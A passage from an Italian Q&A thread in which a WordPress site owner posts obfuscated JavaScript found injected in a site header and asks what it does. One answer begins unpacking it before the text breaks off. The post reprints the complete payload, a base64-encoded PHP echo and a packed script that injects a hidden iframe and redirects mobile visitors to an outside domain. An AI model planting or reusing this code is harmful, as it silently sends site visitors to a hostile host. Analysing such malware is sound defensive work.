JavaScript sospetto nell'intestazione del sito Web

22

Non sono sicuro che questo sia il posto giusto per porre domande come questa, scusami se non lo è.

Ho trovato il codice seguente nell'intestazione di uno dei miei siti Web WordPress, sono abbastanza sicuro che sia dannoso e l'ho rimosso. Tuttavia sono curioso e non riesco a capire qual è lo scopo.

Qualcuno è in grado di fornire idee?

Base 64 Encoded:

CmZ1bmN0aW9uIHVzZXJfYWJvcnRfZW5kX2V4aXRfb3BlcmF0aW9uaWRfODgwNzkwNigpCnsKICAgIGVjaG8gYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHbGtQU0pwWkY4NE9EQTNPVEEySWo1bGRtRnNLR1oxYm1OMGFXOXVLSEFzWVN4akxHc3NaU3hrS1h0bFBXWjFibU4wYVc5dUtHTXBlM0psZEhWeWJpaGpQR0UvSnljNlpTaHdZWEp6WlVsdWRDaGpMMkVwS1NrcktDaGpQV01sWVNrK016VS9VM1J5YVc1bkxtWnliMjFEYUdGeVEyOWtaU2hqS3pJNUtUcGpMblJ2VTNSeWFXNW5LRE0yS1NsOU8ybG1LQ0VuSnk1eVpYQnNZV05sS0M5ZUx5eFRkSEpwYm1jcEtYdDNhR2xzWlNoakxTMHBlMlJiWlNoaktWMDlhMXRqWFh4OFpTaGpLWDFyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLWHRwWmloclcyTmRLWHR3UFhBdWNtVndiR0ZqWlNodVpYY2dVbVZuUlhod0tDZGNYR0luSzJVb1l5a3JKMXhjWWljc0oyY25LU3hyVzJOZEtYMTljbVYwZFhKdUlIQjlLQ2R4SURGMFBUTjRLRW9vS1h0bUtHb3VUU0U5TVVrbUprd2dhaTVOSVQwaVN5SXBlek41S0RGMEtUdG1LRXdnUVZzaU1VRWlYVDA5SWtzaUtYdEJXeUl4UVNKZFBURTdjU0F4Tnowb01UWW9LU1ltTVZJb0tTazdjU0F4VkQwaE1UY21KaUVoUVM0emVpWW1RUzVGTGpOM1BUMDlJak4ySUROeUxpSTdjU0F4YWowdE1UdHhJRWM5SWpOek9pOHZNM1F1TTNVdk0wRWlPMllvVnlncEppWXhhajA5TVNsN1ppZ29SUzVPTGpGdktDOHpRaTlwS1NsOGZDaEZMazR1TVc4b0x6TklMMmtwS1NsN01Ua3VNMGtvUnlsOWVudEJMakU1UFVjN2FpNHhPVDFIZlgxNmUyWW9LREUzSmlZaE1WUW1KaUZYS0NrcEtYdHhJRk05SWp3eE1TQXpTajFjWENJelJ6b3pSanN6UXpvdE0wUTdYRndpUGp3eGVTQXpSVDFjWENJeGJGeGNJaUF6Y1QxY1hDSWlLMGNySWx4Y0lpQXpjRDFjWENJeGJGeGNJajQ4THpGNVBqd3ZNVEUrSWp0eElFazlhaTR6WWlnaU1URWlLVHRtS0VrdU1XMDlQVEFwZTJvdVRTNVFQV291VFM1UUsxTjllbnR4SURGT1BVa3VNVzA3Y1NCU1BUTmpMak5rS0NneFRpOHlLU2s3U1Z0U1hTNVFQVWxiVWwwdVVDdFRmWDE5ZlRGTktDbDlmU3d6WVNrN1NpQXhUU2dwZTNFZ1ZUMGlNemtpTzJZb1ZTRTlJak0xSWlsN2NTQklQV291TXpZb1ZTazdaaWhNSUVnaFBVc21Ka2doUFRGSktYdElMak0zUFNJaU96TTRJRWg5ZlgwN1NpQXhVaWdwZTJZb2FpNUVKaVloYWk0elpTbDdlQ0JDZlhvZ1ppaHFMa1FtSmlGQkxqTm1LWHQ0SUVKOWVpQm1LR291UkNZbUlXb3VNMjBwZTNnZ1FuMTZJR1lvYWk1RUppWWhhaTR6YmlsN2VDQkNmWG9nWmlocUxrUW1KaUZCTGpOdktYdDRJRUo5ZWlCbUtHb3VSQ2w3ZUNCQ2ZYb2daaWhNSUVVdU0yd2hQU0pMSWlZbUlXb3VSQ1ltTVRZb0tTbDdlQ0JDZlhwN2VDQXhZbjE5U2lBeE5pZ3BlM0VnZVQxQkxrVXVUanR4SUZFOWVTNURLQ0l6YXlBaUtUdG1LRkUrTUNsN2VDQmFLSGt1V1NoUkt6VXNlUzVES0NJdUlpeFJLU2tzTVRBcGZYRWdNV3M5ZVM1REtDSXpaeThpS1R0bUtERnJQakFwZTNFZ01UUTllUzVES0NJemFEb2lLVHQ0SUZvb2VTNVpLREUwS3pNc2VTNURLQ0l1SWl3eE5Da3BMREV3S1gxeElFODllUzVES0NJemFTOGlLVHRtS0U4K01DbDdlQ0JhS0hrdVdTaFBLelVzZVM1REtDSXVJaXhQS1Nrc01UQXBmWGdnTVdKOVNpQlhLQ2w3Y1NBeFlUMUJMa1V1VGk0emFpZ3BPMllvTHlnelMzd3pURnhjWkN0OE5HZ3BMaXN4YUh3MGFYdzBhbHhjTDN3MFozdzBabncwWW53MFkzdzBaSHd6Tkh3MGEzd3hkU2cwYkh3eFpDbDhNWEo4TkhKOE5ITWdmRFIwZkRSeGZEUndmREZvTGlzMGJYdzBibncwYnlCdEtEUmhmRFE0S1dsOE0xTW9JREZQS1Q5OE0xUjhjQ2d6Vlh3elVpbGNYQzk4TTFGOE0wMThNMDU4TTA4b05IdzJLVEI4TTFCOE0xWjhNVWhjWEM0b00xZDhORE1wZkRRMGZEUTJmRFF5SURReGZETllmRE5aTDJrdU1VTW9NV0VwZkh3dk0xcDhOSFY4TWt0OE1tWjhNbUY4TlRCYk1TMDJYV2w4TWpoOE1WWjhZU0F4VUh3eFdId3hkeWd4VVh3eGVIeHpYRnd0S1h3eFV5Z3lZbnd5YXlsOE1XY29NbTE4TVc1OE1YWXBmREp1ZkRKa0tESmxmRlo4TW1NcGZESnBmREZtS0RKc2ZERmpLWHd4V2loVWZESnZLWHd4VjN3eFdTZ3ljSHhjWEMxdGZISWdmSE1nS1h3eWNYd3laeWd4Vlh3eGNId3lhQ2w4TVVJb01tcDhNaklwZkRJektERjNmREk1S1h3eU55aGxmSFlwZDN3eU5ud3lORnhjTFNodWZIVXBmREkxWEZ3dmZETXpmREpSZkRKU1hGd3RmREpRZkRKUGZESk1mREpOWEZ3dGZERjJLREpPZkRGRktYd3lXbnd5VmlneFpYd3hjSHd5V0NsOE1uaDhNbmxjWEMxemZESjZmREozZkRKMmZERnBLR044Y0NsdmZESnpLREV5ZkZ4Y0xXUXBmREoxS0RRNWZERlRLWHd5UWlneVNId3lTU2w4TVZFb01rUjhNa1VwZkRKRGZESkdLRnMwTFRkZE1Id3hUM3d4VUh3eVJ5bDhNa0Y4TW5Rb1hGd3RmREZ4S1h3eFRDQjFmREpLZkRKWGZESlpYRnd0Tlh4blhGd3RNVFY4TVdNb1hGd3VkM3d4WkNsOE16RW9NekI4TWxVcGZESnlmREpVZkRKVFhGd3RLRzE4Y0h4MEtYdzBaVnhjTFh3MFJDZ3hSM3d4UmlsOE5tMG9JR2w4TVhVcGZEWnVYRnd0WTN3MmJ5aGpLRnhjTFh3Z2ZERnhmR0Y4WjN4d2ZITjhkQ2w4Tm1zcGZEWm9LRFpwZkRacUtYeHBYRnd0S0RJd2ZERmpmRmdwZkRaeGZEUjJLQ0I4WEZ3dGZGeGNMeWw4Tm5kOE5uaDhObmw4Tm5aOE5uVjhObko4Tm5OOE1YSjhOblFvZEh4MktXRjhObWQ4Tm1aOE5qSjhOak44TmpSOE5Wb29JSHhjWEM4cGZEVlZmRFZXSUh3MVYxeGNMWHcxV0NoamZHc3BmRFkxS0RZMmZEWmpLWHcyWkNnZ1ozeGNYQzhvYTN4c2ZIVXBmRFV3ZkRVMGZGeGNMVnRoTFhkZEtYdzJPSHcyT1h3MmVseGNMWGQ4TnpKOE56TmNYQzk4V0NoVWZEYzBmRGN4S1h3eGVpaEdmREl4ZkRGdUtYeHRYRnd0TmxwOE5sY29ObGg4TVVRcGZEYzFLRGMyZkRkamZERktLWHczWlh3eE5TaEdmRGRrZkRGQ2ZEZGlmREZwZkhRb1hGd3RmQ0I4YjN4MktYdzNOeWw4Tnpnb05UQjhObFY4ZGlBcGZEWlVmRFpIZkRaSVd6QXRNbDE4TmtsYk1pMHpYWHcyUmlnd2ZESXBmRFpGS0RCOE1udzFLWHcyUWlnd0tEQjhNU2w4TVRBcGZEWkRLQ2hqZkcwcFhGd3RmRFpFZkRaS2ZEWkxmRFpSZkRaU0tYdzJVeWcyZkdrcGZEWlBmRFpNZkRaTktEWk9mRFZVS1h3MVUzdzBWM3cwV0h3MFdTaGhmR1I4ZENsOE5GVjhORklvTVROOFhGd3RLRnN4TFRoZGZHTXBLWHcwV253MU1Yd3hTeWcxWVh3MVlpbDhOV05jWEMweWZEVTVLREZWZkRVNGZERnpLWHcxTlh3MU5ud3hSMXhjTFdkOE5UZGNYQzFoZkRSUUtEUkRmREV5ZkRJeGZETXlmRFl3ZkZ4Y0xWc3lMVGRkZkdsY1hDMHBmRFI0ZkRSNWZEUjZmRFJHZkRSSGZEUk5LRFJPZkRSUEtYdzBURnhjTDN3MFN5ZzBTSHhZZkRSSmZEUktmRlo4TldRcGZEVmxLRVo4YUZ4Y0xYd3hlSHh3WEZ3dEtYdzFSMXhjTDN3eGN5aGpLRnhjTFh3d2ZERXBmRFEzZkRGNmZERkZmREZFS1h3MVFWeGNMWHcxUW53MVF5aGNYQzE4YlNsOE5VbGNYQzB3ZkRWS0tEUTFmRFZSS1h3MVVpZ3haM3d4Wm53MVQzd3haWHcxVGlsOE5Vc29OVXg4VmlsOE5VMG9SbnhvWEZ3dGZIWmNYQzE4ZGlBcGZEVjVLRVo4Tld3cGZEVnRLREU0ZkRVd0tYdzFiaWcxYTN3eE1Id3hPQ2w4TVVZb05XZDhOV2dwZkRWcFhGd3RmRFZ2WEZ3dGZEVndLR2w4YlNsOE5YWmNYQzE4ZEZ4Y0xURTFmRFY0S0RGTGZEVjFLWHd4U2lnM01IeHRYRnd0ZkRWeGZEVnlLWHcxYzF4Y0xUbDhNVWdvWEZ3dVlud3hUSHcxZWlsOE5WQjhOVVI4TlVWOE5GWjhObVVvTm5COFZDbDhObXdvTkRCOE5Wc3dMVE5kZkZ4Y0xYWXBmRFYwZkRWM2ZEVm1mRFZxS0RVeWZEVXpmRFl3ZkRZeGZEY3dmRFZJZkRWR2ZEUjNmRFJCZkRSQ0tYdzBSU2hjWEMxOElDbDhORkY4TkZSOE5GTW9aeUI4TmxCOE56a3BmRGRoZkRaWmZEWldmRFpCWEZ3dGZEWTNmRFpoZkRaaVhGd3RMMmt1TVVNb01XRXVOVmtvTUN3MEtTa3BlM2dnUW4xNElERmlmU2NzTmpJc05EUTVMQ2Q4Zkh4OGZIeDhmSHg4Zkh4OGZIeHBabng4Zkh4a2IyTjFiV1Z1ZEh4OGZIeDhmSHgyWVhKOGZIeDhmSHg4Y21WMGRYSnVmSHBDYmtkalVrdHVWV3RuVjJWeFIxTnpSVUZ3VTI1NGRFNXBUVmh4Wm10SGVWbDhaV3h6Wlh4M2FXNWtiM2Q4ZEhKMVpYeHBibVJsZUU5bWZHRnNiSHh1WVhacFoyRjBiM0o4TURGOFdHWllhRVZRU205RWNXbDVabVZTYW0xaVlXNTZVVzVHU2tKdFEwNVRaV1pJWTIxNmNteDhXbXRIU1VSWlExSlhXWGxwU2xsUFZVcEtZM0p1U0VoalMySm9UMXB4VGtGclMwcEVmR3hTWVVabVMwMXFaV2hCY1hGWlZtcFhURnBaVjJGNVdGRndSbUpuU0V4TVZYVnVZM3htZFc1amRHbHZibngxYm1SbFptbHVaV1I4ZEhsd1pXOW1mR0p2WkhsOGRYTmxja0ZuWlc1MGZGSkZWa3hIY1dad2RXNWxkV0ZoU2tWWVNGTkhjRmR1VVdwYVlWcFdVMnRHZkdsdWJtVnlTRlJOVEh4VVFXSnBURk5aVm5aMVRuZEphV2xZZDJsSlVXNW1URU40WVVKRGNuTnZkVk40Y2xOMVNIeHRTazl6UldsYVluVlJhR2xKVkhOWGNGRmFXRWRhWVZKNlZteFFkR3RUVWtaNFRIUm1SM2w4UkdWelZYRjFTMUZLWjBKYWFtOXpVMGhRVjJOU1ZtZDZlVzFoVjNkeVJVbHRWbWw0YjBoMGZIUmxmSFpuV25aNWFrTmtla1JYZDBKMVpFaEZhM1JDYm1GaFoxbFpXV0p1V25oQ2ZHNTVmRXhEU0hGVFNsaG9TWGwxWkhKWGVtOWlTa1JUUTI5WloyZEdjV0ZQU25WU2FXTlBiM3h0WVh4emRXSnpkSEpwYm1kOGNHRnljMlZKYm5SOGZHUnBkbng4ZkVGemFtSm9TMDlzVEZCclJVcHJhWEZuZVVGRlRteEtaMEoxZG5aMVJGRkJmRzF2ZkVweFJrOVhaVWRLVm1wbmJHZFlTbWRpYlZkTlQwOW5jbnBQYW0xNWQwRjViM3hEWVVWYWNraGFjRnBZWjNOUlJsVkVkMU5hVjNKaFQyeG9Za0p5Ukc5QmQzbHRmSHhzYjJOaGRHbHZibnh3UzBwUmRFNTNaRzlDV2twT2NHcDVZMGxZVjI5VmNHdGxhV1pWU1hKYWJFVjhabUZzYzJWOFoyOThiMlI4YVhSOFlYSjhZV3g4Ylc5aWFXeGxmR1J2ZkZwTWRXaHZXSHBrWkdOU1VrcEdjMXBKZEVwS1pITnBTRmxIUjI5QlZWUjhablp4YW1KelRVeGFkMUZvYWtadFdubDNaa3B3VUVwQ2RtRlpUazVRUVdKclRYd3lNWEI0Zkd4bGJtZDBhSHhqWVh4dFlYUmphSHhzYkh4ZmZHbHlhWE44YzJWOGFuaFFiMmRNY205bFdGRjJjRmhyYldkMWJHcGFiMGRUVG01SlVVdFJWWFI4YVhCOFkyOThZV044YjI5OGFXWnlZVzFsZkcxamZIWmZZbVEyTm1Jek1tVXhZbU0yWVdRNU1XVXdNVE14T0dVNE1qYzRPVEU0WmpCOFltbDhkR1Z6ZEh4eWFYeHVaSHgwWVh4d2RIeDFjSHh1ZFd4c2ZIUnpmSEJzZkdjeGZIQkpiMjlLZFhOclNITlRTbTV1V0dkbWFWWkZkbk5HY1hGamNWaFJVV3B2ZkdSc1gyNWhiV1Y4YjNOOGQyRjhaWEo4YVZGRWFsTnlWV0YyUkdoellWcHdRVWRCWkhCMWFXTk9TV2wwUVZGamMzZDBRVmg4WVdsOGJtWjRhVXRtWm5sUmFrVklTV2xtV2tKT1NXWmFVSGwyZFZaQlMxaFJRVmRsYWt0NFptdG1aV2g4WTJ0OE9EQXljM3hoZEhSM2ZHRmlZV044WVhWOFlYTjhmSHh5Wkh4aWJIeGlkM3hqTlRWOFluVnRZbnhpY253M056QnpmR0Y2ZkRSMGFIQjhhMjk4ZVhkOFlXNThaWGg4TTJkemIzeGlaWHh1Y1h4aGNIUjFmR3hpZkhKdWZHTm9mR0YyZkdGdGIybDhkWE44WkdsOFlYWmhibnhvWVdsbGZHUnpmR1pzZVh4bGJIeGtiVzlpZkdScFkyRjhaR0owWlh4a1kzeGtaWFpwZkdabGRHTjhaVzE4WlhOc09IeHBZM3hyTUh4bGVueDZaWHhzTW54MWJIeG5OVFl3ZkRZMU9UQjhZMnhrWTN4amJXUjhiWEI4WTJoMGJYeGpaV3hzZkdOamQyRjhZMlJ0Zkdoa2ZHaGphWFI4ZFc1OFpHRjhaMlZ1Wlh4dVozeG5abnhqY21GM2ZHRmtmR2R5Zkh4allYQnBmR2hwY0hSdmNIeHViMjVsZkdkbGRFVnNaVzFsYm5SQ2VVbGtmRzkxZEdWeVNGUk5USHhrWld4bGRHVjhhV1JmT0Rnd056a3dObnd4TURCOFoyVjBSV3hsYldWdWRITkNlVlJoWjA1aGJXVjhUV0YwYUh4bWJHOXZjbnhqYjIxd1lYUk5iMlJsZkZoTlRFaDBkSEJTWlhGMVpYTjBmRlJ5YVdSbGJuUjhjblo4UldSblpYeDBiMHh2ZDJWeVEyRnpaWHhOVTBsRmZHMWhlRlJ2ZFdOb1VHOXBiblJ6ZkhGMVpYSjVVMlZzWldOMGIzSjhZV1JrUlhabGJuUk1hWE4wWlc1bGNueGhkRzlpZkdobGFXZG9kSHh6Y21OOFNXNWpmR2gwZEhCOGJXbDNhMkYyYjNKcGQydGhmRzFzZkVkdmIyZHNaWHgyWlc1a2IzSjhjMlYwU1c1MFpYSjJZV3g4WTJ4bFlYSkpiblJsY25aaGJIeGphSEp2YldWOE1EVXlSbnhwVUdodmJtVjhiR1ZtZEh3eU5qTXdjSGg4ZDJsa2RHaDhZV0p6YjJ4MWRHVjhjRzl6YVhScGIyNThhVkJ2Wkh4eVpYQnNZV05sZkhOMGVXeGxmR0Z1WkhKdmFXUjhZbUo4Y0c5amEyVjBmSEJ6Y0h4elpYSnBaWE44YzNsdFltbGhibnh3YkhWamEyVnlmSEpsZkhCaGJHMThjR2h2Ym1WOGFYaHBmSFJ5Wlc5OFluSnZkM05sY254NFpHRjhlR2xwYm05OE1USXdOM3g4WTJWOGQybHVaRzkzYzN4c2FXNXJmSFp2WkdGbWIyNWxmSHgzWVhCOGZHbHVmSHh2WW54amIyMXdZV3g4Wld4aGFXNWxmR1psYm01bFkzeG9aV2w4WW14aGVtVnlmR0pzWVdOclltVnljbmw4YldWbFoyOThZWFpoYm5SbmIzeGlZV1JoZkdsbGJXOWlhV3hsZkdodmJtVjhabWx5WldadmVIeHVaWFJtY205dWRIeHZjR1Z5WVh4dGJYQjhiV2xrY0h4cmFXNWtiR1Y4YkdkbGZHMWhaVzF2ZkRZek1UQjhhV0ZqZkRnemZIRjBaV3Q4Y2pNNE1IeHlOakF3ZkRnMWZEazRmREEzZkdocGZIY3pZM3h5WVd0emZISnBiVGw4WjJWOGJXMThiWE44YzJGOGN6VTFmSEp2ZkhabGZIcHZmSEZqZkhkbFltTjhjR2Q4ZDJsOGQyaHBkSHh3WkhobmZIWmxjbWw4YjNkbk1YeHdPREF3ZkhCaGJueHdhR2xzZkh4d2FYSmxmSHg4ZkhCeWIzaDhjSE5wYjN4eFlYeHlkSHh3YjN4aGVYeDFZM3h3Ym54MllYeHpZM3gyZFd4amZHZDBmR3hyZkhSamJIeDJlSHd3TUh4dFlueDBNbngwTm54MFpHZDhkR1ZzZkcwemZHMDFmSFI0ZkhadE5EQjhjMmg4ZEdsdGZIWnZaR0Y4ZEc5OGMzbDhjMmw4YzJkb2ZITm9ZWEo4YzJsbGZIWTBNREI4ZGpjMU1IdzRNWHh6Wkd0OE9EQjhjMnQ4YzJ4OGMyOThablI4YzNCOGREVjhZak44ZFhSemRIeHBaSHh6Ylh4dmNtRnVmSGQyZkd0c2IyNThhM0IwZkd0M1kzeHJlVzk4YzNWaWMzUnlmR3RuZEh4OGZHcHBaM044YTJSa2FYeHJaV3BwZkd4bGZHNXZmSGx2ZFhKOGJHbGlkM3hzZVc1NGZIcGxkRzk4ZW5SbGZIaHBmR3huZkhacGZHcGxiWFY4YW1KeWIzeG9kWHhoZDN4MFkzeDBjSHgyYTN4b2NIeG9jM3hvZEh4eVozeHBNak13ZkdsdWJtOThhWEJoY1h4cVlYeHBiVEZyZkdscmIyMThhV0p5YjN4cFpHVmhmR2xuTURGOGJURjhlV0Z6Zkc0M2ZHNWxmRzl1Zkc0MU1IeHVNekI4YlhsM1lYeHVNVEI4YmpJd2ZIUm1mSGRtZkc4eWFXMThiM0I4ZEdsOGJucHdhSHh1WTN4M1ozeDNkSHh1YjJ0OGJYZGljSHh3TVh4NE56QXdmRzFsZkhKamZIZHZiblY4WTNKOGZIaHZmRzB6WjJGOGJUVXdmSFZwZkcxcGZHODRmSHA2ZkcxMGZHNTNmSGR0YkdKOFpHVjhiMkY4TURKOGJXMWxaaWN1YzNCc2FYUW9KM3duS1N3d0xIdDlLU2tLUEM5elkzSnBjSFErJyk7Cn0KCnJlZ2lzdGVyX3NodXRkb3duX2Z1bmN0aW9uKCd1c2VyX2Fib3J0X2VuZF9leGl0X29wZXJhdGlvbmlkXzg4MDc5MDYnKTsKCg==

Codice effettivo:

<script type="text/javascript" id="id_8807906">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[e(c)] = k[c] || e(c)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c])
            }
        }
        return p
    }('q 1t=3x(J(){f(j.M!=1I&&L j.M!="K"){3y(1t);f(L A["1A"]=="K"){A["1A"]=1;q 17=(16()&&1R());q 1T=!17&&!!A.3z&&A.E.3w==="3v 3r.";q 1j=-1;q G="3s://3t.3u/3A";f(W()&&1j==1){f((E.N.1o(/3B/i))||(E.N.1o(/3H/i))){19.3I(G)}z{A.19=G;j.19=G}}z{f((17&&!1T&&!W())){q S="<11 3J=\"3G:3F;3C:-3D;\"><1y 3E=\"1l\" 3q=\""+G+"\" 3p=\"1l\"></1y></11>";q I=j.3b("11");f(I.1m==0){j.M.P=j.M.P+S}z{q 1N=I.1m;q R=3c.3d((1N/2));I[R].P=I[R].P+S}}}}1M()}},3a);J 1M(){q U="39";f(U!="35"){q H=j.36(U);f(L H!=K&&H!=1I){H.37="";38 H}}};J 1R(){f(j.D&&!j.3e){x B}z f(j.D&&!A.3f){x B}z f(j.D&&!j.3m){x B}z f(j.D&&!j.3n){x B}z f(j.D&&!A.3o){x B}z f(j.D){x B}z f(L E.3l!="K"&&!j.D&&16()){x B}z{x 1b}}J 16(){q y=A.E.N;q Q=y.C("3k ");f(Q>0){x Z(y.Y(Q+5,y.C(".",Q)),10)}q 1k=y.C("3g/");f(1k>0){q 14=y.C("3h:");x Z(y.Y(14+3,y.C(".",14)),10)}q O=y.C("3i/");f(O>0){x Z(y.Y(O+5,y.C(".",O)),10)}x 1b}J W(){q 1a=A.E.N.3j();f(/(3K|3L\d+|4h).+1h|4i|4j\/|4g|4f|4b|4c|4d|34|4k|1u(4l|1d)|1r|4r|4s |4t|4q|4p|1h.+4m|4n|4o m(4a|48)i|3S( 1O)?|3T|p(3U|3R)\/|3Q|3M|3N|3O(4|6)0|3P|3V|1H\.(3W|43)|44|46|42 41|3X|3Y/i.1C(1a)||/3Z|4u|2K|2f|2a|50[1-6]i|28|1V|a 1P|1X|1w(1Q|1x|s\-)|1S(2b|2k)|1g(2m|1n|1v)|2n|2d(2e|V|2c)|2i|1f(2l|1c)|1Z(T|2o)|1W|1Y(2p|\-m|r |s )|2q|2g(1U|1p|2h)|1B(2j|22)|23(1w|29)|27(e|v)w|26|24\-(n|u)|25\/|33|2Q|2R\-|2P|2O|2L|2M\-|1v(2N|1E)|2Z|2V(1e|1p|2X)|2x|2y\-s|2z|2w|2v|1i(c|p)o|2s(12|\-d)|2u(49|1S)|2B(2H|2I)|1Q(2D|2E)|2C|2F([4-7]0|1O|1P|2G)|2A|2t(\-|1q)|1L u|2J|2W|2Y\-5|g\-15|1c(\.w|1d)|31(30|2U)|2r|2T|2S\-(m|p|t)|4e\-|4D(1G|1F)|6m( i|1u)|6n\-c|6o(c(\-| |1q|a|g|p|s|t)|6k)|6h(6i|6j)|i\-(20|1c|X)|6q|4v( |\-|\/)|6w|6x|6y|6v|6u|6r|6s|1r|6t(t|v)a|6g|6f|62|63|64|5Z( |\/)|5U|5V |5W\-|5X(c|k)|65(66|6c)|6d( g|\/(k|l|u)|50|54|\-[a-w])|68|69|6z\-w|72|73\/|X(T|74|71)|1z(F|21|1n)|m\-6Z|6W(6X|1D)|75(76|7c|1J)|7e|15(F|7d|1B|7b|1i|t(\-| |o|v)|77)|78(50|6U|v )|6T|6G|6H[0-2]|6I[2-3]|6F(0|2)|6E(0|2|5)|6B(0(0|1)|10)|6C((c|m)\-|6D|6J|6K|6Q|6R)|6S(6|i)|6O|6L|6M(6N|5T)|5S|4W|4X|4Y(a|d|t)|4U|4R(13|\-([1-8]|c))|4Z|51|1K(5a|5b)|5c\-2|59(1U|58|1s)|55|56|1G\-g|57\-a|4P(4C|12|21|32|60|\-[2-7]|i\-)|4x|4y|4z|4F|4G|4M(4N|4O)|4L\/|4K(4H|X|4I|4J|V|5d)|5e(F|h\-|1x|p\-)|5G\/|1s(c(\-|0|1)|47|1z|1E|1D)|5A\-|5B|5C(\-|m)|5I\-0|5J(45|5Q)|5R(1g|1f|5O|1e|5N)|5K(5L|V)|5M(F|h\-|v\-|v )|5y(F|5l)|5m(18|50)|5n(5k|10|18)|1F(5g|5h)|5i\-|5o\-|5p(i|m)|5v\-|t\-15|5x(1K|5u)|1J(70|m\-|5q|5r)|5s\-9|1H(\.b|1L|5z)|5P|5D|5E|4V|6e(6p|T)|6l(40|5[0-3]|\-v)|5t|5w|5f|5j(52|53|60|61|70|5H|5F|4w|4A|4B)|4E(\-| )|4Q|4T|4S(g |6P|79)|7a|6Y|6V|6A\-|67|6a|6b\-/i.1C(1a.5Y(0,4))){x B}x 1b}', 62, 449, '|||||||||||||||if||||document|||||||var|||||||return|zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY|else|window|true|indexOf|all|navigator|01|XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl|ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD|lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc|function|undefined|typeof|body|userAgent|REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF|innerHTML|TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH|mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy|DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt|te|vgZvyjCdzDWwBudHEktBnaagYYYbnZxB|ny|LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo|ma|substring|parseInt||div|||AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA|mo|JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo|CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym||location|pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE|false|go|od|it|ar|al|mobile|do|ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT|fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM|21px|length|ca|match|ll|_|iris|se|jxPogLroeXQvpXkmguljZoGSNnIQKQUt|ip|co|ac|oo|iframe|mc|v_bd66b32e1bc6ad91e01318e8278918f0|bi|test|ri|nd|ta|pt|up|null|ts|pl|g1|pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo|dl_name|os|wa|er|iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX|ai|nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh|ck|802s|attw|abac|au|as|||rd|bl|bw|c55|bumb|br|770s|az|4thp|ko|yw|an|ex|3gso|be|nq|aptu|lb|rn|ch|av|amoi|us|di|avan|haie|ds|fly|el|dmob|dica|dbte|dc|devi|fetc|em|esl8|ic|k0|ez|ze|l2|ul|g560|6590|cldc|cmd|mp|chtm|cell|ccwa|cdm|hd|hcit|un|da|gene|ng|gf|craw|ad|gr||capi|hiptop|none|getElementById|outerHTML|delete|id_8807906|100|getElementsByTagName|Math|floor|compatMode|XMLHttpRequest|Trident|rv|Edge|toLowerCase|MSIE|maxTouchPoints|querySelector|addEventListener|atob|height|src|Inc|http|miwkavoriwka|ml|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2630px|width|absolute|position|iPod|replace|style|android|bb|pocket|psp|series|symbian|plucker|re|palm|phone|ixi|treo|browser|xda|xiino|1207||ce|windows|link|vodafone||wap||in||ob|compal|elaine|fennec|hei|blazer|blackberry|meego|avantgo|bada|iemobile|hone|firefox|netfront|opera|mmp|midp|kindle|lge|maemo|6310|iac|83|qtek|r380|r600|85|98|07|hi|w3c|raks|rim9|ge|mm|ms|sa|s55|ro|ve|zo|qc|webc|pg|wi|whit|pdxg|veri|owg1|p800|pan|phil||pire||||prox|psio|qa|rt|po|ay|uc|pn|va|sc|vulc|gt|lk|tcl|vx|00|mb|t2|t6|tdg|tel|m3|m5|tx|vm40|sh|tim|voda|to|sy|si|sgh|shar|sie|v400|v750|81|sdk|80|sk|sl|so|ft|sp|t5|b3|utst|id|sm|oran|wv|klon|kpt|kwc|kyo|substr|kgt|||jigs|kddi|keji|le|no|your|libw|lynx|zeto|zte|xi|lg|vi|jemu|jbro|hu|aw|tc|tp|vk|hp|hs|ht|rg|i230|inno|ipaq|ja|im1k|ikom|ibro|idea|ig01|m1|yas|n7|ne|on|n50|n30|mywa|n10|n20|tf|wf|o2im|op|ti|nzph|nc|wg|wt|nok|mwbp|p1|x700|me|rc|wonu|cr||xo|m3ga|m50|ui|mi|o8|zz|mt|nw|wmlb|de|oa|02|mmef'.split('|'), 0, {}))
    
posta bf2mad 15.10.2015 - 14:52
fonte

4 risposte

21

Sembra che il "codice effettivo" che hai pubblicato sia compresso usando il link . Quando lo hai spacchettato, ottieni

var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
if(document.body!=null&&typeof document.body!="undefined")
    {
    clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
    if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
        {
        window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
        var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
